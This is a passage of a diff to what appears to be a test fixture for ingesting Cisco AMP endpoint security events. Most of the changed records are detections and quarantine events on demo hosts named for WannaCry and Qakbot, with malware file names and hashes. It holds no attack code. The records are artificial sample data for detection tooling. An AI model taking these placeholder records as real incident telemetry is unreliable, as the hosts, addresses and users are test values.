Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "severity": 3 @@ -2360,7 +2332,6 @@ ], "code": "2164260880", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131269670Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -2434,7 +2405,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131270433Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "severity": 2 @@ -2528,7 +2498,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131271194Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 @@ -2623,7 +2592,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131271966Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "severity": 2 @@ -2713,7 +2681,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131272730Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -2812,7 +2779,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131273493Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "severity": 2 @@ -2902,7 +2868,6 @@ ], "code": "1090519054", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131274347Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "severity": 2 @@ -2986,7 +2951,6 @@ ], "code": "553648143", "id": "6419214500913742000", - "ingested": "2022-02-02T05:53:17.131275112Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -3058,7 +3022,6 @@ ], "code": "553648143", "id": "6419214492323807000", - "ingested": "2022-02-02T05:53:17.131275876Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3136,7 +3099,6 @@ ], "code": "1090519054", "id": "6419214488028840000", - "ingested": "2022-02-02T05:53:17.131276646Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 @@ -3233,7 +3195,6 @@ ], "code": "1107296257", "id": "14945890085425", - "ingested": "2022-02-02T05:53:17.131277404Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3, @@ -3298,7 +3259,6 @@ "action": "Policy Update", "code": "553648130", "id": "6412574627503014000", - "ingested": "2022-02-02T05:53:17.131278174Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -3366,7 +3326,6 @@ ], "code": "2164260880", "id": "6419204910251770000", - "ingested": "2022-02-02T05:53:17.131278929Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3440,7 +3399,6 @@ ], "code": "1090519054", "id": "6419204910251770000", - "ingested": "2022-02-02T05:53:17.131279683Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3526,7 +3484,6 @@ ], "code": "1090519054", "id": "6419204910251770000", - "ingested": "2022-02-02T05:53:17.131280440Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3614,7 +3571,6 @@ ], "code": "2164260880", "id": "6419204905956803000", - "ingested": "2022-02-02T05:53:17.131281215Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -3690,7 +3646,6 @@ ], "code": "2164260880", "id": "6419204905956803000", - "ingested": "2022-02-02T05:53:17.131281975Z", "kind": "alert", "original": 